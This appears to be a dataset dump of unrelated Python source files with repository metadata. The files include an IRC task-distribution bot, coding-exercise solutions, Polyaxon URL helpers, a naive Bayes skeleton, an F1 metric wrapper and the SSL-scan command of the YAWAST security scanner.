c.nick(c.get_nickname() + "_")
def on_welcome(self, c, e):
t = threading.Thread(target=self.lister)
t.setDaemon(True)
t.start()
def on_privmsg(self, c, e):
nick = nm_to_n(e.source())
c = self.connection
cmd = e.arguments()[0]
do = cmd.split()
if do[0] == "workerjoin":
c.privmsg(nick, "accepted")
mainters.append([nick, do[1]])
activity[nick] = time.time()
print "worker got, name:", nick, "job:", do[1]
self.retasker(do[1])
elif do[0] == "active":
activity[nick] = time.time()
def on_dccmsg(self, c, e):
pass
def on_dccchat(self, c, e):
pass
def lister(self):
while True:
print
print "worker list:"
for mainter in mainters:
if time.time() - activity[mainter[0]] > 30:
print "*", mainter[0], "has been removed"
mainters.remove(mainter)
del activity[mainter[0]]
self.retasker(mainter[1])
continue
print "mainter name:", mainter[0], "job:", mainter[1]
print "--------------------"
print
time.sleep(1*60)
def retasker(self, group, optask = ''):
ingroup = 0
for mainter in mainters:
if mainter[1] == group:
ingroup += 1
if ingroup == 0:
return
if projtasks.has_key(group):
grt = projtasks[group]
else:
grt = tasks
tpc = grt.split('|')
tpcn = round(len(tpc) / ingroup)
i = 0
for mainter in mainters:
if mainter[1] != group:
continue
tts = '|'.join(tpc[int(round(i * tpcn)):int(round((i + 1) * tpcn))])
if tts != False:
self.connection.privmsg(mainter[0], "tasklist " + tts)
i += 1
def main():
bot = MaintcontBot("maintcont", "irc.freenode.net")
bot.start()
if __name__ == "__main__":
main()
|
[
"stephen.larson@933566eb-c141-0410-b91b-f3a7fcfc7766"
] |
stephen.larson@933566eb-c141-0410-b91b-f3a7fcfc7766
|
ec282d154faabb3d27915f38c3c13d823ae008c8
|
39de3097fb024c67a00c8d0e57c937d91f8b2cc9
|
/Graphs/first_depth_first_search.py
|
d08ac89c8316ae345b61554a0dbaf65cbb800397
|
[] |
no_license
|
srajsonu/InterviewBit-Solution-Python
|
4f41da54c18b47db19c3c0ad0e5efa165bfd0cd0
|
6099a7b02ad0d71e08f936b7ac35fe035738c26f
|
refs/heads/master
| 2023-03-07T05:49:15.597928 | 2021-02-24T18:20:07 | 2021-02-24T18:20:07 | 249,359,666 | 0 | 2 | null | 2020-10-06T10:54:07 | 2020-03-23T07:09:53 |
Python
|
UTF-8
|
Python
| false | false | 558 |
py
|
from _collections import defaultdict
class Solution:
def __init__(self):
self.graph = defaultdict(list)
def Solve(self,A,B,C):
n=len(A)
for i in range(n):
self.graph[A[i]].append(i+1)
vis=[0]*(n+1)
q=[]
q.append(C)
vis[C]=1
while q:
a=q.pop(0)
for i in self.graph[a]:
if not vis[i]:
q.append(i)
vis[i]=1
return vis[B]
A=[1,1,1,3,3,2,2,7,6]
B=9
C=1
D=Solution()
print(D.Solve(A,B,C))
|
[
"[email protected]"
] | |
75cc35602ae659ea024b658db136fe838acb3ec8
|
dae4ab4882080344e5f505def7e2e59e0ed888b4
|
/polyaxon/libs/unique_urls.py
|
9a1268f47539af0e3fffc4d92358250465c22ab1
|
[
"MPL-2.0"
] |
permissive
|
vfdev-5/polyaxon
|
8c3945604e8eaa25ba8b3a39ed0838d0b9f39a28
|
3e1511a993dc1a03e0a0827de0357f4adcc0015f
|
refs/heads/master
| 2021-07-09T22:27:23.272591 | 2018-11-01T23:44:44 | 2018-11-01T23:44:44 | 154,320,634 | 0 | 0 |
MIT
| 2018-10-23T12:01:34 | 2018-10-23T12:01:33 | null |
UTF-8
|
Python
| false | false | 1,467 |
py
|
def get_user_url(username):
return '/{}'.format(username)
def get_project_url(unique_name):
values = unique_name.split('.')
return '{}/{}'.format(get_user_url(values[0]), values[1])
def get_user_project_url(username, project_name):
return '{}/{}'.format(get_user_url(username), project_name)
def get_experiment_url(unique_name):
values = unique_name.split('.')
project_url = get_user_project_url(username=values[0], project_name=values[1])
return '{}/experiments/{}'.format(project_url, values[-1])
def get_experiment_health_url(unique_name):
experiment_url = get_experiment_url(unique_name=unique_name)
return '{}/_heartbeat'.format(experiment_url)
def get_experiment_group_url(unique_name):
values = unique_name.split('.')
project_url = get_user_project_url(username=values[0], project_name=values[1])
return '{}/groups/{}'.format(project_url, values[-1])
def get_job_url(unique_name):
values = unique_name.split('.')
project_url = get_user_project_url(username=values[0], project_name=values[1])
return '{}/jobs/{}'.format(project_url, values[-1])
def get_job_health_url(unique_name):
job_url = get_job_url(unique_name=unique_name)
return '{}/_heartbeat'.format(job_url)
def get_build_url(unique_name):
values = unique_name.split('.')
project_url = get_user_project_url(username=values[0], project_name=values[1])
return '{}/builds/{}'.format(project_url, values[-1])
|
[
"[email protected]"
] | |
94c209d3d25c989f349ccd38025fa4dd3e3dbd18
|
7f35d7d1b8f203217f47a615ca8efdb5e17976db
|
/algo/second/p693_binary_number_with_alternating_bits.py
|
1c70b23a02fcb9375c33a53430168b55fc331bdc
|
[] |
no_license
|
thinkreed/lc.py
|
767dd61f4c9454f09e66e48b2974b8d049d6e448
|
ba6b2500b86489cc34852ff73ba0915e57aa0275
|
refs/heads/master
| 2020-05-16T14:49:18.261246 | 2019-07-16T23:42:12 | 2019-07-16T23:42:12 | 183,113,318 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 196 |
py
|
class Solution(object):
def hasAlternatingBits(self, n):
"""
:type n: int
:rtype: bool
"""
a = n ^ (n / 2)
b = a + 1
return not (a & b)
|
[
"[email protected]"
] | |
d3ef66b13c17f8fe1ee580b188cfbdc448362ae2
|
8a2736b2f6ff848d0296aaf64f615ffab10d657d
|
/b_NaiveBayes/Original/Basic.py
|
c43274031e68abacbf14c82fc4271fc557f866f9
|
[] |
no_license
|
amorfortune/MachineLearning
|
4d73edee44941da517f19ff0947dfcc2aab80bb1
|
1923557870002e1331306f651ad7fc7a1c1c1344
|
refs/heads/master
| 2021-01-09T06:02:56.852816 | 2017-02-03T07:22:22 | 2017-02-03T07:22:22 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,477 |
py
|
import numpy as np
from math import pi, exp
sqrt_pi = (2 * pi) ** 0.5
class NBFunctions:
@staticmethod
def gaussian(x, mu, sigma):
return exp(-(x - mu) ** 2 / (2 * sigma ** 2)) / (sqrt_pi * sigma)
@staticmethod
def gaussian_maximum_likelihood(labelled_x, n_category, dim):
mu = [np.sum(
labelled_x[c][dim]) / len(labelled_x[c][dim]) for c in range(n_category)]
sigma = [np.sum(
(labelled_x[c][dim] - mu[c]) ** 2) / len(labelled_x[c][dim]) for c in range(n_category)]
def func(_c):
def sub(_x):
return NBFunctions.gaussian(_x, mu[_c], sigma[_c])
return sub
return [func(_c=c) for c in range(n_category)]
class NaiveBayes:
def __init__(self):
self._x = self._y = None
self._data = self._func = None
self._n_possibilities = None
self._labelled_x = self._label_zip = None
self._cat_counter = self._con_counter = None
self.label_dic = self._feat_dics = None
def __getitem__(self, item):
if isinstance(item, str):
return getattr(self, "_" + item)
def feed_data(self, x, y, sample_weights=None):
pass
def feed_sample_weights(self, sample_weights=None):
pass
def get_prior_probability(self, lb=1):
return [(_c_num + lb) / (len(self._y) + lb * len(self._cat_counter))
for _c_num in self._cat_counter]
def fit(self, x=None, y=None, sample_weights=None, lb=1):
if x is not None and y is not None:
self.feed_data(x, y, sample_weights)
self._func = self._fit(lb)
def _fit(self, lb):
pass
def predict_one(self, x, get_raw_result=False):
if isinstance(x, np.ndarray):
x = x.tolist()
else:
x = x[:]
x = self._transfer_x(x)
m_arg, m_probability = 0, 0
for i in range(len(self._cat_counter)):
p = self._func(x, i)
if p > m_probability:
m_arg, m_probability = i, p
if not get_raw_result:
return self.label_dic[m_arg]
return m_probability
def predict(self, x, get_raw_result=False):
return np.array([self.predict_one(xx, get_raw_result) for xx in x])
def estimate(self, x, y):
y_pred = self.predict(x)
print("Acc: {:12.6} %".format(100 * np.sum(y_pred == y) / len(y)))
def _transfer_x(self, x):
return x
|
[
"[email protected]"
] | |
77f5e2718963f38e6f8d3b4f94db63d867327aac
|
fa074f02d654df1a60e5f5d6cc0e53279f352ba3
|
/Pilot3/P3B7/metrics.py
|
2e3b8e8867ce592d35fdca05cce30c73ebec6bb8
|
[
"MIT"
] |
permissive
|
samcom12/Benchmarks-3
|
2ff5b943df7a0b4f20f8cfa6a9373383a74687e5
|
a48c85a4d4d76905c3392b18e42bea4bd28c518c
|
refs/heads/master
| 2023-08-29T19:44:27.455414 | 2021-08-02T14:34:52 | 2021-08-02T14:34:52 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 867 |
py
|
from pytorch_lightning.metrics.classification import F1
class F1Meter:
def __init__(self, tasks, average='micro'):
self.metrics = self._create_metrics(tasks, average)
def _create_metrics(self, tasks, avg):
"""Create F1 metrics for each of the tasks
Args:
tasks: dictionary of tasks and their respective number
of classes
avg: either 'micro' or 'macro'
"""
return {t: F1(c, average=avg) for t, c in tasks.items()}
def f1(self, y_hat, y):
"""Get the batch F1 score"""
scores = {}
for task, pred in y_hat.items():
scores[task] = self.metrics[task](pred, y[task])
return scores
def compute(self):
"""Compute the F1 score over all batches"""
return {t: f1.compute().item() for t, f1 in self.metrics.items()}
|
[
"[email protected]"
] | |
c026325912bbc226f2020f4804cb3964da43e858
|
4252102a1946b2ba06d3fa914891ec7f73570287
|
/pylearn2/linear/linear_transform.py
|
657282a1c1dbc8111ae74b874623568fcce31f81
|
[] |
no_license
|
lpigou/chalearn2014
|
21d487f314c4836dd1631943e20f7ab908226771
|
73b99cdbdb609fecff3cf85e500c1f1bfd589930
|
refs/heads/master
| 2020-05-17T00:08:11.764642 | 2014-09-24T14:42:00 | 2014-09-24T14:42:00 | 24,418,815 | 2 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,812 |
py
|
"""
.. todo::
WRITEME
"""
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2010-2012, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "Ian Goodfellow"
__email__ = "goodfeli@iro"
class LinearTransform(object):
"""
A generic class describing a LinearTransform. Derived classes may implement linear
transformation as a dense matrix multiply, a convolution, etc.
Classes inheriting from this should also inherit from TheanoLinear's LinearTransform
This class does not directly inherit from TheanoLinear's LinearTransform because
most LinearTransform classes in pylearn2 will inherit from a TheanoLinear derived
class and don't want to end up inheriting from TheanoLinear by two paths
This class is basically just here as a placeholder to show you what extra methods you
need to add to make a TheanoLinear LinearTransform work with pylearn2
"""
def get_params(self):
"""
Return a list of parameters that govern the linear transformation
"""
raise NotImplementedError()
def get_weights_topo(self):
"""
Return a batch of filters, formatted topologically.
This only really makes sense if you are working with a topological space,
such as for a convolution operator.
If your transformation is defined on a VectorSpace then some other class
like a ViewConverter will need to transform your vector into a topological
space; you are not responsible for doing so here.
"""
raise NotImplementedError()
def set_batch_size(self, batch_size):
"""
Some transformers such as Conv2D have a fixed batch size.
Use this method to change the batch size.
"""
pass
|
[
"[email protected]"
] | |
79d7698a4437041440511147e14d336945d9fffe
|
e942cafaf64f6354e1f9ebd4a84bcf236ad93004
|
/yawast/commands/ssl.py
|
bbfe7b60ff039aab4923e020844fa135c88a4fb5
|
[
"MIT"
] |
permissive
|
Prodject/yawast
|
9a441a0576012dc5f0664cd23cfa0a803fd7a477
|
044309709cf3782de75a35f77297f2d2850d8e1c
|
refs/heads/master
| 2020-03-23T02:32:12.357082 | 2020-01-21T18:13:19 | 2020-01-21T18:13:19 | 140,978,938 | 0 | 0 |
BSD-3-Clause
| 2020-01-21T18:13:20 | 2018-07-14T21:23:05 |
Ruby
|
UTF-8
|
Python
| false | false | 1,974 |
py
|
# Copyright (c) 2013 - 2019 Adam Caudill and Contributors.
# This file is part of YAWAST which is released under the MIT license.
# See the LICENSE file or go to https://yawast.org/license/ for full license details.
import socket
from yawast.commands import utils as cutils
from yawast.scanner.cli import ssl_internal, ssl_sweet32, ssl_labs
from yawast.scanner.session import Session
from yawast.shared import utils, output
def start(session: Session):
print(f"Scanning: {session.url}")
# make sure it resolves
try:
socket.gethostbyname(session.domain)
except socket.gaierror as error:
output.debug_exception()
output.error(f"Fatal Error: Unable to resolve {session.domain} ({str(error)})")
return
try:
cutils.check_redirect(session)
except Exception as error:
output.debug_exception()
output.error(f"Unable to continue: {str(error)}")
return
# check to see if we are looking at an HTTPS server
if session.url_parsed.scheme == "https":
if (
session.args.internalssl
or utils.is_ip(session.domain)
or utils.get_port(session.url) != 443
):
# use SSLyze
try:
ssl_internal.scan(session)
except Exception as error:
output.error(f"Error running scan with SSLyze: {str(error)}")
else:
try:
ssl_labs.scan(session)
except Exception as error:
output.debug_exception()
output.error(f"Error running scan with SSL Labs: {str(error)}")
output.norm("Switching to internal SSL scanner...")
try:
ssl_internal.scan(session)
except Exception as error:
output.error(f"Error running scan with SSLyze: {str(error)}")
if session.args.tdessessioncount:
ssl_sweet32.scan(session)
|
[
"[email protected]"
] | |
042f26bfe56643c6652b56921c76c835ae78b86e
|
fcf99db2d9f58da7065369c70f81e3e7cb53356b
|
/extra/dynamic1.py
|
53d37a6922ed684b88e5d2cd97b18c2a630e82aa
|
[] |
no_license
|
manankshastri/self-d
|
b0f438e19d1eb6378093205c49eacd7ad3c53275
|
4266c27118354391cc9677e56c0f494506d390cd
|
refs/heads/master
| 2020-04-24T00:38:53.226656 | 2019-10-14T03:44:40 | 2019-10-14T03:44:40 | 171,572,278 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 253 |
py
|
import time
def fib(x):
if x ==0:
return 0
elif x == 1:
return 1
else:
return fib(x-1) + fib(x-2)
startTime = time.time()
print("%-14s:%d" % ("Result:" , fib(32)))
print("%-14s:%.4f seconds" % ("Elapsed time: ", time.time() - startTime))
|
[
"[email protected]"
] | |
4efa1687dadd46892464c946083720005116424d
|
888f65551bb3fe1b8e84c205796b24678669a649
|
/venv/bin/mako-render
|
e6e8f3b2ebd988dca4cd46c0956c7a2d59f20d2a
|
[] |
no_license
|
chunharrison/NBA-Predictor
|
e6514c70f2cf26d6db4c14aee225cfbd9d5984a7
|
967951ba34debee012385af63f2bf8031dee51ca
|
refs/heads/master
| 2022-05-04T22:02:03.374496 | 2019-05-15T05:55:34 | 2019-05-15T05:55:34 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 258 |
#!/Users/harrison/Documents/NBA-Predictor/venv/bin/python3.7
# -*- coding: utf-8 -*-
import re
import sys
from mako.cmd import cmdline
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(cmdline())
|
[
"[email protected]"
] | ||
f29a1716fb77131024301e47e4439bc769de638a
|
ef32b87973a8dc08ba46bf03c5601548675de649
|
/pytglib/api/types/search_messages_filter_animation.py
|
e52ba5032981ef7f5289e9d53f9ec2a0230f7cab
|
[
"MIT"
] |
permissive
|
iTeam-co/pytglib
|
1a7580f0e0c9e317fbb0de1d3259c8c4cb90e721
|
d3b52d7c74ee5d82f4c3e15e4aa8c9caa007b4b5
|
refs/heads/master
| 2022-07-26T09:17:08.622398 | 2022-07-14T11:24:22 | 2022-07-14T11:24:22 | 178,060,880 | 10 | 9 | null | null | null | null |
UTF-8
|
Python
| false | false | 559 |
py
|
from ..utils import Object
class SearchMessagesFilterAnimation(Object):
"""
Returns only animation messages
Attributes:
ID (:obj:`str`): ``SearchMessagesFilterAnimation``
No parameters required.
Returns:
SearchMessagesFilter
Raises:
:class:`telegram.Error`
"""
ID = "searchMessagesFilterAnimation"
def __init__(self, **kwargs):
pass
@staticmethod
def read(q: dict, *args) -> "SearchMessagesFilterAnimation":
return SearchMessagesFilterAnimation()
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.